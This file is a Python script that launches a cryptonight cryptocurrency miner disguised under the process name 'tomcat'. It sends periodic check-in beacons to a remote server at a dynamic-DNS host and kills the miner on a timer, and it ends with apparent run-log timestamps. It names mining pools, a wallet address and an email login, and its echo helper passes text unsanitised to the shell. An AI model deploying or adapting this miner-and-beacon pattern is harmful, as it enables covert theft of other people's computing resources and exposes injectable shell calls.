import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:07:07.613731
#2018-02-17 16:55:01.259401
#2018-02-17 18:43:05.471464
#2018-02-17 20:31:04.545822
#2018-02-17 22:17:04.730259
#2018-02-18 00:01:05.239025
#2018-02-18 01:52:01.353804
#2018-02-18 03:39:06.971481
#2018-02-18 05:27:06.752421
#2018-02-18 07:20:06.344426
#2018-02-18 09:08:03.490521
#2018-02-18 10:54:01.326950
#2018-02-18 12:41:01.570825
#2018-02-18 14:28:07.289079
#2018-02-18 16:18:07.232754
#2018-02-18 18:07:01.607683
#2018-02-18 19:52:06.698928
#2018-02-18 21:38:07.384608
#2018-02-18 23:26:07.176656
#2018-02-19 01:13:05.949017
#2018-02-19 02:58:06.336242
#2018-02-19 04:45:08.633592
#2018-02-19 06:31:06.292923
#2018-02-19 08:20:03.617050
#2018-02-19 10:09:05.136857
#2018-02-19 11:58:08.832597
#2018-02-19 13:45:09.317291
#2018-02-19 15:34:04.620961
#2018-02-19 17:21:07.015248
#2018-02-19 19:08:06.667188
#2018-02-19 20:53:01.674810
#2018-02-19 22:41:05.564652
#2018-02-20 00:25:04.327613
#2018-02-20 02:12:07.483944
#2018-02-20 04:02:05.132569
#2018-02-20 05:45:06.903418
#2018-02-20 07:31:01.931599
#2018-02-20 09:15:06.071016
#2018-02-20 10:58:01.660721
#2018-02-20 12:45:04.016263
#2018-02-20 14:30:07.824979
#2018-02-20 16:14:06.580572
#2018-02-20 18:02:07.710106
#2018-02-20 19:54:09.482308
#2018-02-20 21:41:03.881464
#2018-02-20 23:22:08.610488
#2018-02-21 01:08:04.044085
#2018-02-21 02:54:07.095190
#2018-02-21 04:41:07.215191
#2018-02-21 06:29:03.651191
#2018-02-21 08:14:03.983764
#2018-02-21 10:00:11.089696
#2018-02-21 11:48:04.760075
#2018-02-21 13:38:06.995768
#2018-02-21 15:21:07.026529
#2018-02-21 17:11:08.879363
#2018-02-21 19:00:04.007597
#2018-02-21 20:48:07.199979
#2018-02-21 22:32:06.528000
#2018-02-22 00:22:06.293081
#2018-02-22 02:10:08.479233
#2018-02-22 03:56:05.049060
#2018-02-22 05:43:08.425026
#2018-02-22 07:27:06.251875
#2018-02-22 09:16:06.541818
#2018-02-22 11:03:06.832182
#2018-02-22 12:48:08.043537
#2018-02-22 14:33:04.571316
#2018-02-22 16:21:01.935765
#2018-02-22 18:08:07.694265
#2018-02-22 19:58:06.172657
#2018-02-22 21:47:01.306391
#2018-02-22 23:35:10.411609
#2018-02-23 01:23:06.676181
#2018-02-23 03:10:06.741661
#2018-02-23 04:57:06.605174
#2018-02-23 06:43:04.186594
#2018-02-23 08:33:01.427216
#2018-02-23 10:46:06.034633
#2018-02-23 12:43:11.621122
#2018-02-23 14:27:05.331114
#2018-02-23 16:19:08.092513
#2018-02-23 18:06:07.887715
#2018-02-23 19:50:05.806230
#2018-02-23 21:34:06.915333
#2018-02-23 23:21:01.780283
#2018-02-24 01:12:01.288876
#2018-02-24 03:04:07.794552
#2018-02-24 04:50:03.968914
#2018-02-24 06:35:05.680244
#2018-02-24 08:23:05.367129
#2018-02-24 10:06:03.334798
#2018-02-24 12:03:03.550990
#2018-02-24 13:51:02.089147
#2018-02-24 15:31:01.646428
#2018-02-24 17:23:05.349647
#2018-02-24 19:11:07.292011
#2018-02-24 20:59:07.562390
#2018-02-24 23:29:03.994687
#2018-02-25 02:53:05.156413
#2018-02-25 06:32:06.064075